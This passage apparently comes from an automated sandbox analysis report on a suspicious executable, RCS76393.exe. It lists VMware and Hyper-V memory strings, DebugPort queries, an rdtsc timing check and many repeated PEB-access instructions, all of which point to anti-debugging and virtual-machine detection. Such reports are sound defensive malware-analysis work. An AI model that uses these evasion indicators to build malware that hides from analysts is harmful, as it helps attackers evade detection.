          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.345500910.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000005.00000000.329599785.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\RCS76393.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RCS76393.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A1C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A22990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A14120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A22AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A22ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A08A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A13A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A3927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00ABEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A84257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AAD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A22397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A1DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A0849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A1746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AA8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A7A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00ABE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A33D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A73540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A17D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A8FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A38EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AAFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AC8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AAFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A28E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00AB1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_009FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A0766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
